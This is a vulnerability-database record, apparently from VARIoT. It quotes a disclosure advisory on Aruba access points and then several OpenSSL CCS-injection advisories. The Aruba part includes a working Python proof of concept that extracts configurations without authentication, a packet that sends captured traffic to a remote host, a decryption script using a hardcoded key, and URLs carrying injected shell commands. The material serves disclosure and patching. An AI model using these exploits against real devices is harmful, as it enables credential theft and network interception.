example, it is possible to request the system configuration\nfrom an AP, bypassing all authentication methods. \n\nIf the above packet is sent using IPC from the webfrontend cgi to the backend,\n(localhost) the reply looks like follows:\n\nmsg_ref 303 /tmp/.cli_msg_SW9iVE\n\nThe cgi binary then reads this file and renders the content in the HTTP reply. \nIf the PAPI packet comes from an external address (instead of localhost) the\nreply points to the APs web server (10.0.0.26 in this case) instead of /tmp/:\n\nmsg_ref 2689 http://10.0.0.26/.cli_msg_n011xh\n\nAccess to this file does not require authentication which raises the severity\nof this vulnerability significantly. \n\nThe following Python script is a proof of concept for this vulnerability,\nsending a \"show configuration\" packet to an AP with the IP address 10.0.0.26:\n\n  import socket\n  def aruba_encrypt(s):\n    return \u0027\u0027.join([chr(ord(c) ^ 0x93) for c in s])\n  header = (\n    \u0027\\x49\\x72\\x00\\x03\\x7f\\x00\\x00\\x01\\x0a\\x00\\x00\\x01\\x00\\x00\\x20\\x13\u0027\n    \u0027\\x3b\\x60\\x3b\\x7e\\x20\\x04\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\u0027\n    \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027\n    \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027\n    \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027\n  )\n  payload = (  # show configuration\n    \u0027\\x04\\x00\\x00\\x00\\x40\\x04\\x00\\x00\\x01\\xfd\\x05\\x0a\\x00\\x00\\x01\\x06\u0027\n    \u0027\\x07\\x02\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x00\\x00\u0027\n    \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027\n    \u0027\\x00\\x13\\x73\\x68\\x6f\\x77\\x20\\x63\\x6f\\x6e\\x66\\x69\\x67\\x75\\x72\\x61\u0027\n    \u0027\\x74\\x69\\x6f\\x6e\\x0a\u0027\n  )\n  sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n  sock.bind((\u0027\u0027, 1337))\n  sock.sendto(header + aruba_encrypt(payload), (\u002710.0.0.26\u0027, 8211))\n  buff = sock.recvfrom(4096)\n  print aruba_encrypt(buff[0])\n\nExecuting the above PoC:\n\n  # python arupapi.py\n  [...]msg_ref 2689 http://10.0.0.26/.cli_msg_n011xh\n\nDownloading the file referenced by the reply returns the full AP configuration,\nincluding all users, passwords and settings (no auth is required on the HTTP\nrequest either):\n\n  # curl -Lk http://10.0.0.26/.cli_msg_n011xh\n  version 6.4.2.0-4.1.1\n  virtual-controller-country XX\n  virtual-controller-key b49ff***REMOVED***\n  name instant-XX:XX:XX\n  terminal-access\n  clock timezone none 00 00\n  rf-band all\n  [...]\n  mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa\n  [...]\n  (full configuration file continues)\n\nFor APs running in \"managed mode\", the above shown exploit does not work. The\nreason for that is, that these APs don\u0027t provide a web server and have only a\nlimited set of commands that can be executed via PAPI. \n\nAdditionally, APs in managed mode do not seem to use the XOR based \"encryption\"\nor MD5 checksums - there was no authentication/encryption found at all. \n\nOne interesting payload for APs in \"managed mode\" using the limited subset of\navailable commands is the ability to capture traffic and send it to a remote\nendpoint via UDP. The example command on the controller would be:\n\n  (aruba_7030_1) #ap packet-capture raw-start ip-addr 192.168.0.1\n100.105.134.45 1337 0 radio 0\n\nThis command would send all traffic of AP 192.168.0.1 from the first radio\ninterface in PCAP format to 100.105.134.45:1337. Wrapped in PAPI, the Packet\nwould look like this:\n\n  0000  49 72 00 03 c0 a8 00 01 7f 00 00 01 00 00 00 00   Ir.............. \n  0010  20 21 20 1c 20 04 01 48 14 08 36 b1 00 00 00 00    ! . ..H..6..... \n  0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0040  00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 65   ...............e\n  0050  78 65 63 75 74 65 43 6f 6d 6d 61 6e 64 4f 62 6a   xecuteCommandObj\n  0060  65 63 74 02 06 02 04 03 00 08 03 00 08 00 00 04   ect............. \n  0070  38 32 32 35 02 06 02 04 00 00 00 03 00 00 02 00   8225............ \n  0080  02 01 04 00 00 00 08 00 00 02 41 50 00 00 02 41   ..........AP...A\n  0090  50 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54 55   P...PACKET-CAPTU\n  00a0  52 45 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54   RE...PACKET-CAPT\n  00b0  55 52 45 00 00 09 52 41 57 2d 53 54 41 52 54 00   URE...RAW-START. \n  00c0  00 09 52 41 57 2d 53 54 41 52 54 00 00 07 49 50   ..RAW-START...IP\n  00d0  2d 41 44 44 52 00 00 0b 31 39 32 2e 31 36 38 2e   -ADDR...192.168. \n  00e0  30 2e 31 00 00 09 74 61 72 67 65 74 2d 69 70 00   0.1...target-ip. \n  00f0  00 0e 31 30 30 2e 31 30 35 2e 31 33 34 2e 34 35   ..100.105.134.45\n  0100  00 00 0b 74 61 72 67 65 74 2d 70 6f 72 74 00 00   ...target-port.. \n  0110  04 31 33 33 37 00 00 06 66 6f 72 6d 61 74 00 00   .1337...format.. \n  0120  01 30 00 00 05 52 41 44 49 4f 00 00 01 30 04 00   .0...RADIO...0.. \n  0130  00 00 00 02 00 02 01 02 00 02 00 00 00 04 73 65   ..............se\n  0140  63 61 00 00 04 72 6f 6f 74                        ca...root\n\nWhen sending this packet to an AP running in managed mode, it confirms the\ncommand and starts sending traffic to the specified host:\n\n  [...]\u003cre\u003e\u003cdata name=\"Packet capture has started for pcap-id\"\npn=\"true\"\u003e1\u003c/data\u003e\u003c/re\u003e\n\n---------------------------------------------------------\n25. AP: Broadcast with detailed system information (LLDP)\n---------------------------------------------------------\n\nAruba APs broadcast detailed system and version information to the wired\nnetworks via LLDP (Link Layer Discovery Protocol). \n\n  0000   02 07 04 00 0b 86 9e 7a 32 04 07 03 00 0b 86 9e  .......z2....... \n  0010   7a 32 06 02 00 78 0a 11 30 30 3a 30 62 3a 38 36  z2...x..00:0b:86\n  0020   3a XX XX 3a XX XX 3a XX XX 0c 3a 41 72 75 62 61  :XX:XX:XX.:Aruba\n  0030   4f 53 20 28 4d 4f 44 45 4c 3a 20 52 41 50 2d 31  OS (MODEL: RAP-1\n  0040   35 35 29 2c 20 56 65 72 73 69 6f 6e 20 36 2e 34  55), Version 6.4\n  0050   2e 32 2e 36 2d 34 2e 31 2e 31 2e 31 30 20 28 35  .2.6-4.1.1.10 (5\n  0060   31 38 31 30 29 0e 04 00 0c 00 08 10 0c 05 01 0a  1810)........... \n  0070   00 00 22 02 00 00 00 0e 00 08 04 65 74 68 30 fe  ..\"........eth0. \n  0080   06 00 0b 86 01 00 01 fe 09 00 12 0f 03 00 00 00  ................ \n  0090   00 00 fe 09 00 12 0f 01 03 6c 03 00 10 fe 06 00  .........l...... \n  00a0   12 0f 04 06 76 00 00                             ....v.. \n\nThe broadcast packet contains the APs MAC address, model number and exact\nfirmware version.This detailed information could aid an attacker to easily find\nand identify potential targets for known vulnerabilities. \n\n------------------------------------------------------\n26. AP: User passwords are encrypted with a static key\n------------------------------------------------------\n\nBased on the vulnerability shown in #24 which potentially discloses the\npassword hashes of AP user accounts, the implemented hashing algorithm was\ntested. CVE-2014-7299 describes the password hashes as \"encrypted password\nhashes\". The following line shows the mgmt-user configuration for the user\n\"admin\" with password \"admin\":\n\n  mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa\n\nSome testing with various passwords and especially password lengths showed that\nthe passwords are actually encrypted and not hashed (as hash algorithms produce\nthe same length output for different length input):\n\n  f9ac59cd431e174fb07539a8a811a1aa                 # admin\n  d7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf # adminadmin\n\nThe encryption algorithm used for the above passwords turned out to be 3DES in\nCBC mode. The encryption algorithm uses a 24 byte static key which is hardcoded\non the AP. Sampling of different Firmware versions confirmed that the key is\nidentical for all available versions. The IV required for 3DES consists of 8\nrandom bytes, and is stored as the first 8 byte of the encrypted password. The\nfollowing Python script can be used to decrypt the above hashes:\n\n  import pyDes\n  hashes = (\n    \u0027f9ac59cd431e174fb07539a8a811a1aa\u0027, # admin\n    \u0027d7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf\u0027 # adminadmin\n  )\n  key = (\n    \u0027\\x32\\x74\\x10\\x84\\x91\\x17\\x75\\x46\\x14\\x75\\x82\\x92\u0027\n    \u0027\\x43\\x49\\x04\\x59\\x18\\x69\\x15\\x94\\x27\\x84\\x30\\x03\u0027\n  )\n  for h in hashes:\n    d = pyDes.triple_des(key, pyDes.CBC, h.decode(\u0027hex\u0027)[:8], pad=\u0027\\00\u0027)\n    print h, \u0027=\u003e\u0027, d.decrypt(h.decode(\u0027hex\u0027)[8:])\n\nMitigation\n==========\nAruba released three advisories, related to the issues reported here:\n\n  http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-004.txt\n  http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-005.txt\n  http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-006.txt\n\nFollowing the resolution advises given in those advisories is strongly\nrecommended. These advisories are also available on the Aruba security bulletin:\n\n  http://www.arubanetworks.com/support-services/security-bulletins/\n\nFor the vulnerabilities related to PAPI, Aruba has made the following document\navailable:\n\n  http://community.arubanetworks.com/aruba/attachments/aruba/aaa-nac-guest-access-byod/25840/1/Control_Plane_Security_Best_Practices_1_0.pdf\n\nThis doc gives several advises how to remediate the PAPI related\nvulnerabilities. An update fixing the issues is announced for Q3/2016. \nFor further information there is also a discussion thread in Aruba\u0027s Airheads\nCommunity Forum:\n\n  http://community.arubanetworks.com/t5/AAA-NAC-Guest-Access-BYOD/Security-vulnerability-advisories/m-p/266095#M25840\n\nAuthor\n======\nThe vulnerabilities were discovered by Sven Blumenstein from Google Security\nTeam. \n\n\nTimeline\n========\n2016/01/22 - Security report sent to sirt@arubanetworks.com with 90 day\n             disclosure deadline (2016/04/22). \n2016/01/22 - Aruba acknowledges report and starts working on the issues. \n2016/02/01 - Asking Aruba for ETA on detailed feedback. \n2016/02/03 - Detailed feedback for all reported vulnerabilities received. \n2016/02/16 - Answered several questions from the feedback, asked Aruba for\n             patch ETA. \n2016/02/29 - Pinged for patch ETA. \n2016/03/08 - Pinged for patch ETA. \n2016/03/12 - Received detailed list with approx. ETA for patch releases and\n             current status. \n2016/03/21 - Aruba asks for extension of 90 day disclosure deadline. \n2016/03/24 - Asked Aruba for exact patch release dates. \n2016/04/02 - Aruba confirmed 4.2.x branch update for 2016/04/15, 4.1.x branch\n             update for 2016/04/30 (past 90 day deadline). \n2016/04/14 - 14 day grace period for disclosure was granted, according to\n             the disclosure policy. New disclosure date was set to 2016/05/06. \n2016/05/02 - Asking for status of still unreleased \u0027end of April\u0027 update. \n2016/05/02 - Aruba confirmed availability of update on 2016/05/09 (after grace\n             period). \n2016/05/03 - Aruba released three advisories on\nhttp://www.arubanetworks.com/support-services/security-bulletins/\n2016/05/06 - Public disclosure",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-2032"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009617"
      },
      {
        "db": "BID",
        "id": "90207"
      },
      {
        "db": "PACKETSTORM",
        "id": "136997"
      }
    ],
    "trust": 1.98
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-2032",
        "trust": 2.8
      },
      {
        "db": "PACKETSTORM",
        "id": "136997",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009617",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201607-363",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "90207",
        "trust": 0.3
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "90207"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009617"
      },
      {
        "db": "PACKETSTORM",
        "id": "136997"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201607-363"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2032"
      }
    ]
  },
  "id": "VAR-202001-1252",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.13247864
  },
  "last_update_date": "2022-05-04T09:26:12.722000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ARUBA-PSA-2016-005",
        "trust": 0.8,
        "url": "https://www.arubanetworks.com/assets/alert/aruba-psa-2016-005.txt"
      },
      {
        "title": "Aruba Networks ArubaOS , AirWave Management Platform  and Instant Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=62935"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009617"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201607-363"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-287",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009617"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2032"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2016-005.txt"
      },
      {
        "trust": 1.6,
        "url": "http://seclists.org/fulldisclosure/2016/may/19"
      },
      {
        "trust": 1.6,
        "url": "https://www.google.com/about/appsecurity/research/"
      },
      {
        "trust": 1.6,
        "url": "https://packetstormsecurity.com/files/136997/aruba-authentication-bypass-insecure-transport-tons-of-issues.html"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2032"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2032"
      },
      {
        "trust": 0.1,
        "url": "https://www.geotrust.com/resources/cps"
      },
      {
        "trust": 0.1,
        "url": "http://community.arubanetworks.com/t5/aaa-nac-guest-access-byod/security-vulnerability-advisories/m-p/266095#m25840"
      },
      {
        "trust": 0.1,
        "url": "http://images.arubanetworks.com/fwfiles/arubainstant_aries_6.4.2.6-4.1.1.10_51810"
      },
      {
        "trust": 0.1,
        "url": "http://images.arubanetworks.com/fwfiles/arubainstant_pegasus_6.4.2.6-4.1.1.10_51810"
      },
      {
        "trust": 0.1,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2016-004.txt"
      },
      {
        "trust": 0.1,
        "url": "http://images.arubanetworks.com/fwfiles/arubainstant_centaurus_6.4.2.6-4.1.1.10_51810"
      },
      {
        "trust": 0.1,
        "url": "http://10.0.xx.xx/?\"`/sbin/utelnetd`\""
      },
      {
        "trust": 0.1,
        "url": "http://www.arubanetworks.com/support-services/security-bulletins/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2031"
      },
      {
        "trust": 0.1,
        "url": "http://10.0.0.26/.cli_msg_n011xh"
      },
      {
        "trust": 0.1,
        "url": "http://images.arubanetworks.com/fwfiles/arubainstant_taurus_6.4.2.6-4.1.1.10_51810"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-7299"
      },
      {
        "trust": 0.1,
        "url": "http://images.arubanetworks.com/fwfiles/arubainstant_cassiopeia_6.4.2.6-4.1.1.10_51810"
      },
      {
        "trust": 0.1,
        "url": "http://10.0.0.1/?\"`/usr/sbin/mini_httpd+-d+/+-u+root+-p+1234+-c+/etc/mini_httpd.conf`\"\u0026auto_reboot=false\u0026refresh=true\u0026sid=owsiu5mm7dxvf9frwe3p\u0026nocache=0.9368100591919084"
      },
      {
        "trust": 0.1,
        "url": "http://community.arubanetworks.com/aruba/attachments/aruba/aaa-nac-guest-access-byod/25840/1/control_plane_security_best_practices_1_0.pdf"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-0932"
      },
      {
        "trust": 0.1,
        "url": "https://10.0.xx.xx:4343/"
      },
      {
        "trust": 0.1,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2016-006.txt"
      },
      {
        "trust": 0.1,
        "url": "http://images.arubanetworks.com/fwfiles/arubainstant_orion_6.4.2.6-4.1.1.10_51810"
      },
      {
        "trust": 0.1,
        "url": "http://community.arubanetworks.com/t5/unified-wired-wireless-access/os5-0-support-password/td-p/26760"
      },
      {
        "trust": 0.1,
        "url": "http://10.0.0.1:4321/arubainstant_aries_6.4.2.6-4.1.1.10_51810"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009617"
      },
      {
        "db": "PACKETSTORM",
        "id": "136997"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201607-363"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2032"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "90207"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009617"
      },
      {
        "db": "PACKETSTORM",
        "id": "136997"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201607-363"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2032"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-05-06T00:00:00",
        "db": "BID",
        "id": "90207"
      },
      {
        "date": "2020-02-21T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-009617"
      },
      {
        "date": "2016-05-06T23:02:22",
        "db": "PACKETSTORM",
        "id": "136997"
      },
      {
        "date": "2016-05-06T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201607-363"
      },
      {
        "date": "2020-01-31T20:15:00",
        "db": "NVD",
        "id": "CVE-2016-2032"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-07-06T14:36:00",
        "db": "BID",
        "id": "90207"
      },
      {
        "date": "2020-02-21T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-009617"
      },
      {
        "date": "2021-07-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201607-363"
      },
      {
        "date": "2021-05-04T13:32:00",
        "db": "NVD",
        "id": "CVE-2016-2032"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "136997"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201607-363"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Aruba AirWave Management Platform Authentication vulnerabilities in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009617"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "authorization issue",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201607-363"
      }
    ],
    "trust": 0.6
  }
}

var-201406-0445
Vulnerability from variot

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the "CCS Injection" vulnerability. OpenSSL is prone to security-bypass vulnerability. Successfully exploiting this issue may allow attackers to obtain sensitive information by conducting a man-in-the-middle attack. This may lead to other attacks. Versions prior to OpenSSL 1.0.1 and 1.0.2-beta1 are vulnerable.

HP Connect IT / HP SPM CIT - 9.5x Please install: HP Connect IT 9.53.P2

For Windows http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00070

For Linux http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00071

For AIX http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00072

For HPUX http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00073

For Solaris http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00074

HP Connect IT / HP SPM CIT - 9.4x Please install: HP Connect IT 9.40.P1

For windows(en) http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00075

For Linux(en) http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00076

For AIX(en) http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00077

For HPUX(en) http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00078

For Solaris(en) http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00079

HP Connect IT / HP SPM AM 5.2x Please install: HP Connect IT 9.41.P1

HISTORY Version:1 (rev.1) - 19 August 2014 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. ============================================================================ Ubuntu Security Notice USN-2232-3 June 23, 2014

openssl regression

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 14.04 LTS
  • Ubuntu 13.10
  • Ubuntu 12.04 LTS
  • Ubuntu 10.04 LTS

Summary:

USN-2232-1 introduced a regression in OpenSSL. The upstream fix for CVE-2014-0224 caused a regression for certain applications that use renegotiation, such as PostgreSQL. This update fixes the problem.

Original advisory details:

J=C3=BCri Aedla discovered that OpenSSL incorrectly handled invalid DTLS fragments. This issue only affected Ubuntu 12.04 LTS, Ubuntu 13.10, and Ubuntu 14.04 LTS. (CVE-2014-0195) Imre Rad discovered that OpenSSL incorrectly handled DTLS recursions. A remote attacker could use this issue to cause OpenSSL to crash, resulting in a denial of service. (CVE-2014-0221) KIKUCHI Masashi discovered that OpenSSL incorrectly handled certain handshakes. (CVE-2014-0224) Felix Gr=C3=B6bert and Ivan Fratri=C4=87 discovered that OpenSSL incorrectly handled anonymous ECDH ciphersuites. A remote attacker could use this issue to cause OpenSSL to crash, resulting in a denial of service. This issue only affected Ubuntu 12.04 LTS, Ubuntu 13.10, and Ubuntu 14.04 LTS. (CVE-2014-3470)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.4

Ubuntu 13.10: libssl1.0.0 1.0.1e-3ubuntu1.6

Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.16

Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.19

After a standard system update you need to reboot your computer to make all the necessary changes.

References: http://www.ubuntu.com/usn/usn-2232-3 http://www.ubuntu.com/usn/usn-2232-1 https://launchpad.net/bugs/1332643

Package Information: https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.4 https://launchpad.net/ubuntu/+source/openssl/1.0.1e-3ubuntu1.6 https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.16 https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.19 . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201407-05

                                        http://security.gentoo.org/

Severity: High Title: OpenSSL: Multiple vulnerabilities Date: July 27, 2014 Bugs: #512506 ID: 201407-05

Synopsis

Multiple vulnerabilities have been found in OpenSSL, possibly allowing remote attackers to execute arbitrary code.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 dev-libs/openssl < 1.0.1h-r1 >= 0.9.8z_p5 >= 0.9.8z_p4 >= 0.9.8z_p1 >= 0.9.8z_p3 >= 0.9.8z_p2 >= 1.0.0m >= 1.0.1h-r1

Description

Multiple vulnerabilities have been discovered in OpenSSL.

Workaround

There is no known workaround at this time.

Resolution

All OpenSSL users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.1h-r1"

References

[ 1 ] CVE-2010-5298 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-5298 [ 2 ] CVE-2014-0195 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0195 [ 3 ] CVE-2014-0198 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0198 [ 4 ] CVE-2014-0221 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0221 [ 5 ] CVE-2014-0224 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0224 [ 6 ] CVE-2014-3470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3470 [ 7 ] OpenSSL Security Advisory [05 Jun 2014] http://www.openssl.org/news/secadv_20140605.txt

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-201407-05.xml

Concerns?

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License

Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5 . The bulletin does not apply to any other 3rd party application (e.g. operating system, web server, or application server) that may be required to be installed by the customer according instructions in the product install guide. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04347622

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04347622 Version: 1

HPSBHF03052 rev.1 - HP Intelligent Management Center (iMC), HP Network Products including H3C and 3COM Routers and Switches running OpenSSL, Remote Denial of Service (DoS), Code Execution, Unauthorized Access, Modification or Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2014-06-20 Last Updated: 2014-06-20

Potential Security Impact: Remote Denial of Service (DoS), code execution, unauthorized access, modification of information, disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Intelligent Management Center (iMC), HP Network Products including 3COM and H3C routers and switches running OpenSSL. The vulnerabilities could be exploited remotely to create a Denial of Service (DoS), execute code, allow unauthorized access, modify or disclose information.

References:

CVE-2010-5298 Remote Denial of Service (DoS) or Modification of Information CVE-2014-0198 Remote Unauthorized Access (only iMC impacted) CVE-2014-0224 Remote Unauthorized Access or Disclosure of Information SSRT101561 Note: All products listed are impacted by CVE-2014-0224 . iMC is also impacted by CVE-2014-0198 and CVE-2010-5298

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Please refer to the RESOLUTION section below for a list of impacted products.

BACKGROUND

CVSS 2.0 Base Metrics

Reference Base Vector Base Score CVE-2010-5298 (AV:N/AC:H/Au:N/C:N/I:P/A:P) 4.0 CVE-2014-0198 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0224 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION On June 5th 2014, OpenSSL.org issued an advisory with several CVE vulnerabilities. HP Networking is working to release fixes for these vulnerabilities that impact the products in the table below. As fixed software is made available, this security bulletin will be updated to show the fixed versions. Until the software fixes are available, HP Networking is providing the following information including possible workarounds to mitigate the risks of these vulnerabilities.

Description

The most serious issue reported is CVE-2014-0224 and it is the one discussed here. To take advantage CVE-2014-0224, an attacker must:

be in between the OpenSSL client and OpenSSL server. be capable of intercepting and modifying packets between the OpenSSL client and OpenSSL server in real time.

Workarounds

HP Networking equipment is typically deployed inside firewalls and access to management interfaces and other protocols is more tightly controlled than in public environments. This deployment and security restrictions help to reduce the possibility of an attacker being able to intercept both OpenSSL client and OpenSSL server traffic.

